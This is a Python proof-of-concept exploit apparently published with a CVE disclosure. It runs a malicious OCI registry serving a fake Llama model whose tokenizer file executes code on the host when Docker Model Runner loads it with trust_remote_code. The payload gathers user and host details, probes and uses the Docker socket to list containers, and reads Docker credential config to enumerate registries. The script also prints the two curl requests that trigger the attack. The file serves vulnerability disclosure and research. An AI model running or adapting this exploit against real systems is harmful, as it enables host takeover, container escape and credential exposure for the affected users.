5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / rce_registry.py PY
#!/usr/bin/env python3
#
# Malicious OCI registry for the Docker Model Runner PoC.
#
# Serves a minimal valid Llama model that contains an evil_tokenizer.py.
# Every blob's declared digest matches its content. A real attacker would
# build it like this. The "no digest verification" claim is proven by static
# analysis (see test_claims.py, claims 1a-1c), not by tampering here.
#
# Introspection endpoints (for the test harness):
#   /_poc/health       status
#   /_poc/digest_map   digest -> content mapping with verification
#   /_poc/requests     request log
#   /_poc/selftest     verify every blob is internally consistent

import hashlib
import http.server
import json
import os
import struct
import sys
import threading
import time
import traceback

try:
    import numpy as np
except ImportError:
    print("ERROR: numpy is required. pip install numpy")
    sys.exit(1)

PORT = int(os.environ.get("REGISTRY_PORT", "5555"))
REPO = "evil/rce-model"
PROOF_FILE = os.environ.get("PROOF_FILE", "/tmp/poc_rce_proof")

request_log = []
request_log_lock = threading.Lock()


def sha256_digest(data):
    return "sha256:" + hashlib.sha256(data).hexdigest()


# Payload: runs on the host when vLLM imports it via trust_remote_code.
EVIL_TOKENIZER_PY = f"""\
import os
import socket
import json
import time

proof = {{
    "rce": True,
    "hostname": socket.gethostname(),
    "user": os.popen("whoami 2>/dev/null").read().strip(),
    "uid": os.popen("id 2>/dev/null").read().strip(),
    "cwd": os.getcwd(),
    "pid": os.getpid(),
    "ppid": os.getppid(),
    "timestamp": time.time(),
    "env_HOME": os.environ.get("HOME", ""),
    "model_dir": os.path.dirname(os.path.abspath(__file__)),
    "can_read_etc_passwd": os.path.exists("/etc/passwd"),
    "can_write_tmp": os.access("/tmp", os.W_OK),
}}

# Container escape proof. We're on the host, so if the Docker socket is
# reachable we control the whole daemon: enumerate, exec, create new
# containers. unpriv container -> host RCE -> daemon -> any container.
docker_socket = "/var/run/docker.sock"
proof["docker_socket_exists"] = os.path.exists(docker_socket)
proof["docker_socket_writable"] = os.access(docker_socket, os.W_OK)

docker_ps = os.popen("docker ps --format '{{{{.ID}}}} {{{{.Names}}}} {{{{.Image}}}}'  2>/dev/null").read().strip()
proof["docker_ps"] = docker_ps if docker_ps else None
proof["docker_ps_count"] = len(docker_ps.strip().split("\\n")) if docker_ps.strip() else 0

docker_version = os.popen("docker version --format '{{{{.Server.Version}}}}' 2>/dev/null").read().strip()
proof["docker_version"] = docker_version if docker_version else None

# Don't exfiltrate creds, just prove we could read them.
docker_config_path = os.path.expanduser("~/.docker/config.json")
proof["docker_config_exists"] = os.path.exists(docker_config_path)
if os.path.exists(docker_config_path):
    try:
        with open(docker_config_path) as dc:
            docker_cfg = json.load(dc)
        proof["docker_config_has_auths"] = "auths" in docker_cfg
        proof["docker_config_registries"] = list(docker_cfg.get("auths", {{}}).keys())
    except Exception:
        proof["docker_config_has_auths"] = None

try:
    with open("{PROOF_FILE}", "w") as f:
        json.dump(proof, f, indent=2)
    with open("{PROOF_FILE}.flag", "w") as f:
        f.write("RCE_CONFIRMED")
except Exception as e:
    import sys
    print(f"RCE fired but couldn't write proof file: {{e}}", file=sys.stderr)
    print(json.dumps(proof), file=sys.stderr)

from transformers import AutoTokenizer

class EvilTokenizer(AutoTokenizer):
    pass
""".encode()

# tokenizer_config.json - auto_map points at evil_tokenizer.py.
# This is what triggers the code import under trust_remote_code.
TOKENIZER_CONFIG = json.dumps({
    "auto_map": {
        "AutoTokenizer": [
            "evil_tokenizer.EvilTokenizer",
            "evil_tokenizer.EvilTokenizer",
        ]
    },
    "tokenizer_class": "EvilTokenizer",
    "model_max_length": 2048,
}, indent=2).encode()

# Minimal valid Llama-architecture weights (safetensors)
H, I, V = 64, 128, 32000
TENSORS = {
    "model.embed_tokens.weight":                       (V, H),
    "model.layers.0.self_attn.q_proj.weight":          (H, H),
    "model.layers.0.self_attn.k_proj.weight":          (H, H),
    "model.layers.0.self_attn.v_proj.weight":          (H, H),
    "model.layers.0.self_attn.o_proj.weight":          (H, H),
    "model.layers.0.mlp.gate_proj.weight":             (I, H),
    "model.layers.0.mlp.up_proj.weight":               (I, H),
    "model.layers.0.mlp.down_proj.weight":             (H, I),
    "model.layers.0.input_layernorm.weight":           (H,),
    "model.layers.0.post_attention_layernorm.weight":  (H,),
    "model.norm.weight":                               (H,),
    "lm_head.weight":                                  (V, H),
}


def build_safetensors():
    parts = []
    header = {"__metadata__": {"format": "pt"}}
    offset = 0
    for name, shape in TENSORS.items():
        arr = np.zeros(shape, dtype=np.float32)
        raw = arr.tobytes()
        header[name] = {
            "dtype": "F32",
            "shape": list(shape),
            "data_offsets": [offset, offset + len(raw)],
        }
        parts.append(raw)
        offset += len(raw)
    hdr = json.dumps(header).encode()
    return struct.pack("<Q", len(hdr)) + hdr + b"".join(parts)


SAFETENSORS_BLOB = build_safetensors()

# Standard HF model config
HF_CONFIG = json.dumps({
    "architectures": ["LlamaForCausalLM"],
    "model_type": "llama",
    "hidden_size": H,
    "intermediate_size": I,
    "num_attention_heads": 2,
    "num_hidden_layers": 1,
    "num_key_value_heads": 2,
    "vocab_size": V,
    "max_position_embeddings": 2048,
    "torch_dtype": "float32",
    "rms_norm_eps": 1e-5,
    "rope_theta": 10000.0,
    "head_dim": 32,
    "mlp_hidden_size": I,
}, indent=2).encode()

# OCI image structure. Every declared digest matches its content.
MODEL_CONFIG = json.dumps({
    "config": {
        "format": "safetensors",
        "architecture": "llama",
        "parameters": "1B",
        "size": "1B",
    },
    "rootfs": {
        "type": "layers",
        "diff_ids": [
            sha256_digest(SAFETENSORS_BLOB),
            sha256_digest(HF_CONFIG),
            sha256_digest(TOKENIZER_CONFIG),
            sha256_digest(EVIL_TOKENIZER_PY),
        ],
    },
}).encode()

MANIFEST = json.dumps({
    "schemaVersion": 2,
    "mediaType": "application/vnd.oci.image.manifest.v1+json",
    "config": {
        "mediaType": "application/vnd.docker.ai.model.config.v0.1+json",
        "digest": sha256_digest(MODEL_CONFIG),
        "size": len(MODEL_CONFIG),
    },
    "layers": [
        {
            "mediaType": "application/vnd.docker.ai.safetensors",
            "digest": sha256_digest(SAFETENSORS_BLOB),
            "size": len(SAFETENSORS_BLOB),
            "annotations": {"org.cncf.model.filepath": "model.safetensors"},
        },
        {
            "mediaType": "application/vnd.docker.ai.model.file",
            "digest": sha256_digest(HF_CONFIG),
            "size": len(HF_CONFIG),
            "annotations": {"org.cncf.model.filepath": "config.json"},
        },
        {
            "mediaType": "application/vnd.docker.ai.model.file",
            "digest": sha256_digest(TOKENIZER_CONFIG),
            "size": len(TOKENIZER_CONFIG),
            "annotations": {"org.cncf.model.filepath": "tokenizer_config.json"},
        },
        {
            "mediaType": "application/vnd.docker.ai.model.file",
            "digest": sha256_digest(EVIL_TOKENIZER_PY),
            "size": len(EVIL_TOKENIZER_PY),
            "annotations": {"org.cncf.model.filepath": "evil_tokenizer.py"},
        },
    ],
}).encode()

MANIFEST_DIGEST = sha256_digest(MANIFEST)

# digest -> content (each digest matches its content)
BLOBS = {
    sha256_digest(MODEL_CONFIG):     MODEL_CONFIG,
    sha256_digest(SAFETENSORS_BLOB): SAFETENSORS_BLOB,
    sha256_digest(HF_CONFIG):        HF_CONFIG,
    sha256_digest(TOKENIZER_CONFIG): TOKENIZER_CONFIG,
    sha256_digest(EVIL_TOKENIZER_PY): EVIL_TOKENIZER_PY,
}

# Human-readable labels for log lines
BLOB_LABELS = {
    sha256_digest(MODEL_CONFIG):     "model-config",
    sha256_digest(SAFETENSORS_BLOB): "model.safetensors",
    sha256_digest(HF_CONFIG):        "config.json",
    sha256_digest(TOKENIZER_CONFIG): "tokenizer_config.json",
    sha256_digest(EVIL_TOKENIZER_PY): "evil_tokenizer.py [PAYLOAD]",
}


def selftest():
    # Verify each blob's declared digest matches its actual content.
    errors = []
    for declared_digest, content in BLOBS.items():
        actual = sha256_digest(content)
        if declared_digest != actual:
            errors.append(f"MISMATCH: declared={declared_digest[:32]}... actual={actual[:32]}...")

    manifest_data = json.loads(MANIFEST)
    config_digest = manifest_data["config"]["digest"]
    if config_digest not in BLOBS:
        errors.append(f"Manifest config digest {config_digest[:32]}... not in blob store")

    for layer in manifest_data["layers"]:
        layer_digest = layer["digest"]
        if layer_digest not in BLOBS:
            errors.append(f"Manifest layer digest {layer_digest[:32]}... not in blob store")
        actual_size = len(BLOBS.get(layer_digest, b""))
        if layer["size"] != actual_size:
            errors.append(f"Layer {layer_digest[:32]}... size mismatch: "
                          f"manifest={layer['size']} actual={actual_size}")

    config_data = json.loads(MODEL_CONFIG)
    for diff_id in config_data["rootfs"]["diff_ids"]:
        if diff_id not in BLOBS:
            errors.append(f"Config diff_id {diff_id[:32]}... not in blob store")

    return errors


class Handler(http.server.BaseHTTPRequestHandler):
    def log_message(self, fmt, *args):
        msg = fmt % args
        ts = time.strftime("%H:%M:%S")
        label = ""
        if "/blobs/" in self.path:
            digest = self.path.split("/blobs/")[-1]
            label = f" [{BLOB_LABELS.get(digest, 'unknown')}]"
        print(f"[{ts}] {self.client_address[0]} {msg}{label}")
        with request_log_lock:
            request_log.append({
                "time": time.time(),
                "method": self.command,
                "path": self.path,
                "client": self.client_address[0],
            })

    def _respond(self, code, body=b"", content_type="application/json", headers=None):
        try:
            self.send_response(code)
            self.send_header("Content-Type", content_type)
            self.send_header("Content-Length", str(len(body)))
            for k, v in (headers or {}).items():
                self.send_header(k, v)
            self.end_headers()
            if self.command != "HEAD":
                self.wfile.write(body)
        except BrokenPipeError:
            pass  # client gone, normal on HEAD probes

    def do_GET(self):
        self._route()

    def do_HEAD(self):
        self._route()

    def _route(self):
        p = self.path

        if p.rstrip("/") == "/v2":
            return self._respond(200, b"{}", headers={
                "Docker-Distribution-API-Version": "registry/2.0",
            })

        if p == "/_poc/health":
            with request_log_lock:
                blob_reqs = [r for r in request_log if "/blobs/" in r["path"]]
                manifest_reqs = [r for r in request_log if "/manifests/" in r["path"]]
            return self._respond(200, json.dumps({
                "status": "ok",
                "port": PORT,
                "proof_file": PROOF_FILE,
                "total_requests": len(request_log),
                "manifest_requests": len(manifest_reqs),
                "blob_requests": len(blob_reqs),
            }, indent=2).encode())

        if p == "/_poc/requests":
            with request_log_lock:
                data = list(request_log)
            return self._respond(200, json.dumps(data, indent=2).encode())

        if p == "/_poc/selftest":
            errors = selftest()
            return self._respond(200, json.dumps({
                "passed": len(errors) == 0,
                "errors": errors,
                "blob_count": len(BLOBS),
                "manifest_digest": MANIFEST_DIGEST,
            }, indent=2).encode())

        if p == "/_poc/digest_map":
            digest_map = {}
            for digest, content in BLOBS.items():
                actual = sha256_digest(content)
                digest_map[digest] = {
                    "label": BLOB_LABELS.get(digest, "unknown"),
                    "declared_digest": digest,
                    "actual_content_digest": actual,
                    "matches": digest == actual,
                    "size": len(content),
                }
            return self._respond(200, json.dumps(digest_map, indent=2).encode())

        if "/manifests/" in p:
            return self._respond(200, MANIFEST,
                content_type="application/vnd.oci.image.manifest.v1+json",
                headers={"Docker-Content-Digest": MANIFEST_DIGEST})

        if "/blobs/" in p:
            digest = p.split("/blobs/")[-1]
            blob = BLOBS.get(digest)
            if blob is not None:
                return self._respond(200, blob,
                    content_type="application/octet-stream",
                    headers={"Docker-Content-Digest": digest})
            return self._respond(404, b'{"errors":[{"code":"BLOB_UNKNOWN"}]}')

        self._respond(200, b"{}")


def main():
    errors = selftest()
    if errors:
        print("FATAL: registry self-test failed:")
        for e in errors:
            print(f"  {e}")
        sys.exit(1)

    print("=== Docker Model Runner RCE PoC registry ===")
    print(f"Port:       {PORT}")
    print(f"Proof file: {PROOF_FILE}")
    print(f"Blobs:      {len(BLOBS)} (all digests consistent)")
    print()
    print("Model contents:")
    for digest, label in BLOB_LABELS.items():
        print(f"  {digest[:24]}... {label} ({len(BLOBS[digest])} bytes)")
    print()
    print("Self-test: PASSED")
    print()
    print("Use it (two requests = host RCE):")
    print()
    print(f"  curl -X POST http://model-runner.docker.internal/api/pull \\")
    print(f"    -H 'Content-Type: application/json' \\")
    print(f"    -d '{{\"name\":\"localhost:{PORT}/{REPO}:latest\"}}'")
    print()
    print(f"  curl -X POST http://model-runner.docker.internal/engines/v1/chat/completions \\")
    print(f"    -H 'Content-Type: application/json' \\")
    print(f"    -d '{{\"model\":\"localhost:{PORT}/{REPO}:latest\",\"messages\":[{{\"role\":\"user\",\"content\":\"hello\"}}]}}'")
    print()
    print(f"Then: cat {PROOF_FILE}")
    print()
    print(f"Listening on 0.0.0.0:{PORT}...")
    print()

    try:
        http.server.HTTPServer(("0.0.0.0", PORT), Handler).serve_forever()
    except KeyboardInterrupt:
        print("\nShutdown.")


if __name__ == "__main__":
    main()